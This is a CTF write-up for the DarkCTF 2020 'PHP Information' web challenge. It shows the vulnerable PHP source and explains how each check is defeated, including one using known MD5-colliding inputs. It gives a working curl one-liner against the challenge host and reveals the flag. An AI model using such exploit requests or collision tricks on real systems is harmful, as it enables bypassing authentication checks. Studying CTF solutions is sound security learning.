Cookie Consent by PrivacyPolicies.com

DarkCTF 2020: Web/PHP Information


DarkCTF 2020: Web/PHP Information

Web/PHP Information

198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web

Solution

We started with some php code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>
</head>
<body>
    

    <style>
        body{
            background-color: whitesmoke
        }
    </style>
<?php

include "flag.php";

echo show_source("index.php");


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}


if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
                
        }
    }



    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
        else
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }



?>
</body>
</html> 
1

There are bunch of ifs, that needs to be defeated before getting the flag:

- darkctf parameter must be set to 2020
- User-Agent must be set to 2020_the_best_year_corona (it came from base64 decoded string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (it's base64 encoded (not decoded!!) string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the most tricky one, karma and 2020 parameters must not be equal, but their md5 hashes needs to be the same, so we need to use strings which are affected by hash collision

I've used the hexcodes for the karma and 2020 parameters and decoded them into right strings with xxd on the fly, because bash is not doing well with nonprintable characters. Flag has been conquered with following oneliner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "http://php.darkarmy.xyz:7001/?darkctf=2020&ctf2020=WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09" --verbose

DarkCTF{very_nice_web_challenge_dark_ctf}